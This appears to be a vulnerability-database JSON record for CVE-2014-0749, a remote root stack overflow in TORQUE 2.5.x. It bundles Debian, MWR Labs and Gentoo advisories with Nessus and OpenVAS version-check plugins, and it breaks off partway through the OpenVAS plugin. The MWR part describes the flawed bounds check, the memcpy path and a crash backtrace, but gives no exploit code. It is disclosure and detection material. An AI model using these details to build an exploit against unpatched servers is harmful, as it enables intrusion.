Stack-based buffer overflow in lib/Libdis/disrsi_.c in Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 2.5.x through 2.5.13 allows remote attackers to execute arbitrary code via a large count value.
{"securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2936-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMay 23, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : torque\r\nCVE ID : CVE-2014-0749\r\nDebian Bug : 748827\r\n\r\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\r\nvulnerability in torque, a PBS-derived batch processing queueing system.\r\nAn unauthenticated remote attacker could exploit this flaw to execute\r\narbitrary code with root privileges.\r\n\r\nFor the oldstable distribution (squeeze), this problem has been fixed in\r\nversion 2.4.8+dfsg-9squeeze4.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 2.4.16+dfsg-1+deb7u3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 2.4.16+dfsg-1.4.\r\n\r\nWe recommend that you upgrade your torque packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJTfxKGAAoJEAVMuPMTQ89EQp8QAJnp462bdRlyCSh0flxIxdnF\r\nm1TwK9I76qWhbxIF/f6uxFB/AF7lMkLtHzNPvfZr4GwNXNgcb9oTSf4vs1olccwI\r\nVfJsvt1vwaAhKjFmTiP8LlnAfL7LPFnOIs7yYVquLZ2pDOYlgOTQURL5sSSiSJ/H\r\n8IjxgvASJMPLF/vQNTBOxOKJhqerloQXmBtHbYuMwglOx4c6K+d8mNTMlB1TO+M2\r\nKO90E5PBq1gK3tJ02XXy4/ykS3bqBaW6U7IvEtzCC8z/yxoqIvZFQwdWKHDjB2wE\r\na6RTzNUD9p24ShXLzabJQGD++H+3VnpECzj+wjh1sQN8pE/2KlzJoIiRfBsce3jt\r\n1mzvMBIJNwhie5VKRqI/KlEl6C+AAMqAIvXORWhO9HYmTcdD8YFpkAF28cW1f++C\r\nxwr3V1WKXZQnFHEO02sLoxKXcCinHvTF8C55vVlxZO6Lng06w5Braun46v8i0zGy\r\noq1Tu9kHF7DYsRaENStTBaeaq4SuVKzGxMtFN+HYZDAWxx1uRjZFyShr6BDup6im\r\nROS38IgdV1cuE7v1wnk8YVzxxryao+JYQgItGrsgabC3ojbUEvpUIObMZ6wdyA5Q\r\ndMSl6qxQWcQMG5ANmSDmnCUbYXGB0ibL/jUUXOuZCQbcSPABnr+KoQ6BG5BUEgRY\r\n290BbLzaKsviiMhHG0CN\r\n=rBXi\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-05-29T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-29T00:00:00", "id": "SECURITYVULNS:DOC:30762", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30762", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:14:15", "description": "Buffer overflow on task processing.", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "securityvulns", "title": "torque buffer overflow", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:VULN:13788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13788", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nA buffer overflow exists in versions of TORQUE which can be exploited in order to remotely execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, upto and including 2.5.13\r\n\r\nSoftware: TORQUE\r\nAffected Versions: All 2.5 releases up to and including 2.5.13\r\nCVE Reference: CVE-2014-0749\r\nAuthors: John Fitzpatrick (MWR Labs)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Incorporated MWR supplied fix into 2.5 development branch, no advisory\r\n\r\n[Description]\r\n\r\nA buffer overflow exists in older versions of TORQUE which can be exploited in order to remotely execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, up to and including 2.5.13.\r\n\r\n\r\n[Impact]\r\n\r\nSuccessful exploitation allows remote execution of code as root.\r\n\r\n\r\n[Cause]\r\n\r\nThis issue exists as a result of a misplaced bounds check.\r\n\r\n\r\n[Solution]\r\n\r\nDespite still being widely used Torque 2.5.x is now end of life and no longer supported by Adaptive. The latest version of the 2.5 branch (2.5.13) is vulnerable to this issue. MWR have submitted a fix to the 2.5-dev GitHub repository (which is still active) which resolves this issue. It is strongly recommended that a version of 2.5-dev (later than pull request #171) is updated to.\r\n\r\nCode changes in the 4.2.x branch significantly enhance the security posture of TORQUE and so MWR would recommend updating to this branch if possible.\r\n\r\n\r\n[Technical Details]\r\n\r\nTORQUE is a widely used resource manager. There are several branches 2.x, 3.x and 4.\u0427. The code is open source, but maintained by Adaptive Computing.\r\nOperations such as job submissions and querying of job queues within TORQUE are handled by the pbs_server component. It was found that the pbs_server did not perform sufficient bounds checking on messages sent to it. As a result it was found to be possible to submit messages which resulted in an overflow leading to arbitrary code execution. This could be achieved from a remote, unauthenticated perspective regardless of whether the source IP address is permitted to submit jobs or not.\r\n\r\nThe vulnerability exists because the file disrsi_.c fails to ensure that the length of count (which is read from the request packet) is less than dis_umaxd prior to being used in a later memcpy(). As a result a specially crafted request can smuggle through a count value which is later decremented and becomes the ct value in a memcpy() made from within tcp_gets():\r\n\r\nmemcpy((char *)str, tp->tdis_leadp, ct);\r\n\r\nThis failure to validate count allows control over the size of the memcpy() to be leveraged and as a result control over the amount of data read from the remainder of the packet. If this value is large the memcpy() will overwrite the stack and so can be leveraged in order to gain control over the execution of the program.\r\n\r\nA backtrace showing the flow of execution is shown below:\r\n\r\n#0 0x0000003dd4a88b9a in memcpy () from /lib64/libc.so.6\r\n#1 0x00007fa0008cb65b in tcp_gets (fd=11, str=0x7fff8dfce741 '3' <repeats 26 times>,\r\n"Ab1Ab2Ab3",\r\nct=332) at ../Libifl/tcp_dis.c:567\r\n#2 0x00007fa0008be994 in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=333)\r\nat ../Libdis/disrsi_.c:187\r\n#3 0x00007fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=<value optimized out>) at ../Libdis/disrsi_.c:216\r\n#4 0x00007fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=<value optimized out>) at ../Libdis/disrsi_.c:216\r\n#5 0x00007fa0008bdfab in disrfst (stream=11, achars=33, value=0x27f0b58 "")\r\nat ../Libdis/disrfst.c:125\r\n#6 0x00007fa0008c13ba in decode_DIS_ReqHdr (sock=11, preq=0x27f0b20,\r\nproto_type=0x7fff8dfce9dc,\r\nproto_ver=0x7fff8dfce9d8) at ../Libifl/dec_ReqHdr.c:141\r\n#7 0x0000000000409ba1 in dis_request_read (sfds=11, request=0x27f0b20) at dis_read.c:137\r\n#8 0x000000000041cb6e in process_request (sfds=11) at process_request.c:355\r\n#9 0x00007fa0008d4899 in wait_request (waittime=<value optimized out>, SState=0x72c258)\r\nat ../Libnet/net_server.c:508\r\n#10 0x000000000041afeb in main_loop () at pbsd_main.c:1203\r\n#11 0x000000000041bd15 in main (argc=<value optimized out>, argv=<value optimized out>)\r\nat pbsd_main.c:1760\r\n\r\nTORQUE is required to run as root and so successful exploitation leads to code execution as root. MWR have created a proof of concept exploit for TORQUE running on 64bit versions of CentOS which makes use of return oriented programming and ROP gadgets in order to execute arbitrary code as root. This vulnerability can be exploited reliably and remotely. It is possible to reach this path of execution from a remote and unauthenticated perspective (and regardless of whether the attackers system is in the acl_hosts list or not). It is expected that code execution within a 32bit environment is simpler to achieve.\r\n\r\nWhilst the necessary bounds check was found to be missing from all versions of TORQUE reviewed this issue was only found to be directly exploitable in the 2.5 branch; code changes which have taken place in the 4.x branches prevent the condition required for exploitation from being reached. The vulnerability exists because the necessary check on the size of count occurs too late within the disrsi_.c file. The fix is, therefore, to introduce the appropriate check on the size of \u201ccount\u201d. Replacing disrsi_.c with the patched 2.5-dev version (https://github.com/adaptivecomputing/torque/blob/2.5-dev/src/lib/Libdis/disrsi_.c) and recompiling should be sufficient to resolve this issue.\r\n\r\n\r\n[Detailed Timeline]\r\n\r\n2012: Vulnerability identified\r\n06/12/2012: Proof of concept developed\r\n22/07/2013: Vulnerability reported to Adaptive Computing\r\n20/08/2013: MWR requested update from Adaptive\r\n22/08/2013: Github pull request to resolve issue made by MWR with a fix\r\n21/01/2014: Further communication with Adaptive \r\n13/05/2014: Advisory published\r\n\r\n\r\n[Original Advisory]\r\n\r\nhttps://labs.mwrinfosecurity.com/system/assets/662/original/torque-buffer-overflow_2014-05-14.pdf\r\n\r\n", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "securityvulns", "title": "[CVE-2014-0749] TORQUE Buffer Overflow", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:DOC:30773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30773", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-18T14:20:02", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow vulnerability in torque, a PBS-derived batch processing queueing system. An unauthenticated remote attacker could exploit this flaw to execute arbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-25T00:00:00", "type": "nessus", "title": "Debian DSA-2936-1 : torque - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:torque", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2936.NASL", "href": "https://www.tenable.com/plugins/nessus/74164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2936. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74164);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0749\");\n script_bugtraq_id(67420);\n script_xref(name:\"DSA\", value:\"2936\");\n\n script_name(english:\"Debian DSA-2936-1 : torque - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing\nsystem. An unauthenticated remote attacker could exploit this flaw to\nexecute arbitrary code with root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=748827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/torque\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/torque\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2936\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the torque packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:torque\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libtorque2\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libtorque2-dev\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-client\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-client-x11\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-common\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-mom\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-pam\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-scheduler\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-server\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtorque2\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtorque2-dev\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-client\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-client-x11\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-common\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-mom\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-pam\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-scheduler\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-server\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:42", "description": "The remote host is affected by the vulnerability described in GLSA-201412-47 (TORQUE Resource Manager: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in TORQUE Resource Manager. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-12-29T00:00:00", "type": "nessus", "title": "GLSA-201412-47 : TORQUE Resource Manager: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2193", "CVE-2011-2907", "CVE-2011-4925", "CVE-2013-4319", "CVE-2013-4495", "CVE-2014-0749"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:torque"], "id": "GENTOO_GLSA-201412-47.NASL", "href": "https://www.tenable.com/plugins/nessus/80268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-47.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80268);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2193\", \"CVE-2011-2907\", \"CVE-2011-4925\", \"CVE-2013-4319\", \"CVE-2013-4495\", \"CVE-2014-0749\");\n script_bugtraq_id(48374, 49119, 51224, 62273, 63722, 67420);\n script_xref(name:\"GLSA\", value:\"201412-47\");\n\n script_name(english:\"GLSA-201412-47 : TORQUE Resource Manager: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-47\n(TORQUE Resource Manager: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in TORQUE Resource\n Manager. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-47\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All TORQUE Resource Manager 4.x users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/torque-4.1.7'\n All TORQUE Resource Manager 2.x users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/torque-2.5.13'\n NOTE: One or more of the issues described in this advisory have been\n fixed in previous updates. They are included in this advisory for the\n sake of completeness. It is likely that your system is already no longer\n affected by them.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:torque\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-cluster/torque\", unaffected:make_list(\"ge 4.1.7\", \"rge 2.5.13\"), vulnerable:make_list(\"lt 4.1.7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"TORQUE Resource Manager\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-10-21T23:08:48", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2936-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : torque\nCVE ID : CVE-2014-0749\nDebian Bug : 748827\n\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-05-23T09:19:39", "type": "debian", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-23T09:19:39", "id": "DEBIAN:DSA-2936-1:21E9F", "href": "https://lists.debian.org/debian-security-announce/2014/msg00117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:33:31", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2936-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : torque\nCVE ID : CVE-2014-0749\nDebian Bug : 748827\n\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-05-23T09:19:39", "type": "debian", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-23T09:19:39", "id": "DEBIAN:DSA-2936-1:16000", "href": "https://lists.debian.org/debian-security-announce/2014/msg00117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-08-04T10:48:49", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2936-1 (torque - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2017-07-20T00:00:00", "id": "OPENVAS:702936", "href": "http://plugins.openvas.org/nasl.php?oid=702936", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2936.nasl 6769 2017-07-20 09:56:33Z teissa $\n# Auto-generated from advisory DSA 2936-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"torque on Debian Linux\";\ntag_insight = \"The TORQUE server dispatches jobs across physically separated machines. It\nmay also be beneficial for single machines to organise the sequential execution\nof multiple jobs.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\";\ntag_summary = \"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702936);\n script_version(\"$Revision: 6769 $\");\n script_cve_id(\"CVE-2014-0749\");\n script_name(\"Debian Security Advisory DSA 2936-1 (torque - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-20 11:56:33 +0200 (Thu, 20 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-05-23 00:00:00 +0200 (Fri, 23 May 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2936.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 